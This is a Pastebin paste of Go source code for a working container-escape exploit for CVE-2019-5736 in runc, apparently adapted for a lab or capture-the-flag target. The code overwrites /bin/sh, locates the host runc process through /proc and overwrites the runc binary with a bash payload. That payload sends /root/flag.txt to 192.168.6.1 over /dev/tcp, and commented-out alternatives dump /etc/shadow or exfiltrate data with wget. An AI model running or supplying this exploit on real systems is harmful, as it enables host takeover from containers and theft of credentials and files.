Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- package main
- // Implementation of CVE-2019-5736
- // Created with help from @singe, @_cablethief, and @feexd.
- // This commit also helped a ton to understand the vuln
- // https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
- // Modified by josevnz@yahoo.com
- import (
- "fmt"
- "io/ioutil"
- "os"
- "strconv"
- "strings"
- )
- // This is the line of shell commands that will execute on the host
- // var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"
- // var payload = "#!/bin/bash \n /usr/bin/wget http://192.168.6.1/`cat /root/flag.txt|base64`"
- var payload = "#!/bin/bash \n exec 3<>/dev/tcp/192.168.6.1/8000 && cat /root/flag.txt >&3"
- func main() {
- fmt.Println("[+] Started script..., payload:", payload)
- // First we overwrite /bin/sh with the /proc/self/exe interpreter path
- fd, err := os.Create("/bin/sh")
- if err != nil {
- fmt.Println("[-] Failed to overwrite /bin/sh")
- fmt.Println(err)
- return
- }
- fmt.Fprintln(fd, "#!/proc/self/exe")
- err = fd.Close()
- if err != nil {
- fmt.Println("[-] Cannot get fd for /proc/self/exe")
- fmt.Println(err)
- return
- }
- fmt.Println("[+] Overwritten /bin/sh successfully")
- // Loop through all processes to find one whose cmdline includes runcinit
- // This will be the process created by runc
- var found int
- for found == 0 {
- pids, err := ioutil.ReadDir("/proc")
- if err != nil {
- fmt.Println("[-] Cannot read /proc")
- fmt.Println(err)
- return
- }
- for _, f := range pids {
- fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
- fstring := string(fbytes)
- if strings.Contains(fstring, "runc") {
- fmt.Println("[+] Found the PID:", f.Name())
- found, err = strconv.Atoi(f.Name())
- if err != nil {
- fmt.Println("[-] Cannot convert PID for runc")
- fmt.Println(err)
- return
- }
- }
- }
- }
- // We will use the pid to get a file handle for runc on the host.
- var handleFd = -1
- for handleFd == -1 {
- // Note, you do not need to use the O_PATH flag for the exploit to work.
- handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
- if int(handle.Fd()) > 0 {
- handleFd = int(handle.Fd())
- }
- }
- fmt.Println("[+] Successfully got the file handle")
- // Now that we have the file handle, lets write to the runc binary and overwrite it
- // It will maintain it's executable flag
- for {
- writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
- if int(writeHandle.Fd()) > 0 {
- fmt.Println("[+] Successfully got write handle", writeHandle)
- writeHandle.Write([]byte(payload))
- fmt.Println("[+] Wrote payload...")
- return
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement